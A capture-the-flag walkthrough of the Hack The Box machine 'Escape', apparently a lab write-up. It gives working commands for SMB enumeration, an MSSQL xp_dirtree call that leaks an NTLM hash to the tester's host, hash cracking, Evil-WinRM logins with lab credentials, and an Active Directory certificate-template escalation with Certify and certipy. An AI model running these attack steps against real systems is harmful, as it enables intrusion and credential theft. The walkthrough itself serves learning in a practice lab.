Index
Scanning and Enumeration
nmap -sSCV --open -p- --min-rate 5000 -n -Pn -oN scan 10.10.10.161
In the scan we discovered some domains. I added the following domains to my /etc/hosts file:
sequel.htb
dc.sequel.htb
dc
Since there is SMB open, I decided to inspect it using NetExec with a guest session, and also used the Rid-Brute utility to try to discover some users.
nxc smb 10.10.11.202 -u 'guest' -p '' --shares --rid-brute
There is an interesting Share named “Public”, and we also discovered the following users:
Administrator
Guest
krbtgt
DnsAdmins
DnsUpdateProxy
Tom.Henn
Brandon.Brown
Ryan.Cooper
sql_svc
James.Roberts
Nicole.Thompson
SQLServer2005SQLBrowserUser
As usual, I tried to do an AS-REP Roast attack with this list of users, but none of these users are vulnerable.
Investigating the shared resources, I found that in “Public” there is a document called “SQL Server Procedures.pdf”.
Here we find some credentials related to MSSQL.
PublicUser
GuestUserCantWrite1
Using the mssqlclient.py tool we can access the database.
mssqlclient.py PublicUser:'GuestUserCantWrite1'@10.10.11.202Exploitation
I tried to enumerate the database in search of important information, but found nothing. I also did not succeed in executing commands.
One thing you can do when you have access to the MSSQL database, is to get the Net-NTLMv2 hash of the user running MSSQL on the server, and then break it to get his password.
In this case, I listened with Responder and got the Hash, which I subsequently bruteforced to get the password.
exec xp_dirtree '\\10.10.14.27\share';
hashcat hashes /usr/share/wordlists/rockyou.txt
sql_svc
REGGIE1234ronnie
I tested the credentials successfully, so I was able to connect to the target using Evil-WinRM.
evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnieCuriously, the user flag was not found on this user.
Lateral Movement
I decide to enumerate the system, where in the SQLServer logs folder I found plain text credentials for the user Ryan.Cooper.
sequel.htb\Ryan.Cooper
NuclearMosquito3
Testing the credentials, I find that they are valid, and I was able to connect using Evil-WinRM. The user flag was found here.
Privilege Escalation
Listing the system, I did not manage to find anything interesting. Going back, the Nmap scan showed outputs related to certificates and the use of LDAPS. This leads me to think that maybe certificates are being used on the machine.
To verify vulnerabilities related to certificates, there is the Certify tool.
https://github.com/GhostPack/Certify
I transferred the executable to the victim machine and ran the following command to find out if templates exist.
.\Certify.exe cas
Since there are several templates enabled, this tool also allows you to see if any of them are vulnerable.
.\Certify.exe find /vulnerable
According to the output, this certificate is vulnerable because it has very broad permissions, allowing any user in the “Domain Users” group to request a certificate using this template, which allows user impersonation.
To exploit the vulnerability, the certipy tool is also to be run from Linux environments. In this case, a valid certificate was requested for the Administrator user.
certipy req -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -template UserAuthentication -upn Administrator@sequel.htb -target sequel.htb -ca sequel-dc-caOnce the .pfx certificate has been obtained we can try to get the hash of the Administrator user.
certipy auth -pfx administrator.pfx -domain sequel.htb
Once the hash is obtained, we can do a Pass-the-Hash attack to connect as Administrator and get the root flag.
